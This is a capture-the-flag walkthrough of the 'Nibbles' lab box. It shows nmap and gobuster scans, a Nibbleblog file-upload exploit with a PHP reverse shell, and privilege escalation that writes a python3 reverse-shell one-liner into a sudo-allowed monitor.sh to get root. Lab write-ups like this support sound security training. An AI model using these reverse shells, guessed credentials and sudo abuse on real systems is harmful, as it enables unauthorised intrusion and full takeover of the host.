Nibbles

This box is very straight forward and teaches hackers a way of enumerating and researching exploits that are available online.

Reconnaissance

# Nmap 7.91 scan initiated Sun Mar 14 00:25:31 2021 as: nmap -sC -sV -p22,80 -oN nibbles.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.10s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 14 00:25:42 2021 -- 1 IP address (1 host up) scanned in 11.03 seconds

After running the nmap scan, go to the web browser and visit the server and review the page source.

Next step would be to visit the webpage directory as specified.

After trying default credentials it did not work, it also has a lockout mechanism, which means you can get banned. Nothing much here, the password is nibbles and must go based on what you think a system administrator with poor practice would use. We'll proceed to finding a username with GoBuster.

Running GoBuster Scan

└─$ gobuster dir --url http://10.10.10.75/nibbleblog/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/03/14 18:23:03 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 402] 
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] 
/feed.php             (Status: 200) [Size: 302]                                             
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]  
/admin.php            (Status: 200) [Size: 1401]                                            
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php          (Status: 200) [Size: 78]                                              
/update.php           (Status: 200) [Size: 1622]                                            
/README               (Status: 200) [Size: 4628]                                            
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]

Found Username and Version

These were found while searching the GoBuster directories

Found Exploit

─$ searchsploit nibble
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                                               | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                | php/remote/38489.rb
------------------------------------------------------------------------------------- ---------------------------------

More information on this exploit can be found here.

Triggered!*(#*!(#*!packetstormsecurity.com

The exploit is straight forward, gain credentials, upload php reverse shell and execute.

Uploading Shell

Login to through the admin panel, the passowrd is nibbles as guessed and upload one of the following shells with your kali IP

re/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

They should all suffice, so pick your poison.

Set up your listener and visit the following link.

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php10.10.10.75

┌──(kali㉿kali)-[~/HTB/Nibbles]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 52458
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 18:46:16 up 19 min,  0 users,  load average: 0.00, 0.02, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler

Once your connection is established, check if you can create any files that you can run as another user.

nibbler@Nibbles:/home/nibbler$ sudo -l 
sudo: unable to resolve host Nibbles: Connection timed out
  tching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Create the following folders and file, along with python reverse code.

nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh 

#!/bin/sh

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SO
CK_STREAM);s.connect(("10.10.10.75",7777));os.dup2(s.fileno(),0); os.dup2(s.file
no(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Set up your listener and execute the create script as sudo.

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh 
sudo: unable to resolve host Nibbles: Connection timed out

Getting ROOT

─$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 36800
# whoami
root
# ls
bakmonitor.sh
monitor.sh
test.py
# cd /root
# ls
root.txt

PreviousBashed NextSense

Last updated 4 years ago

Was this helpful?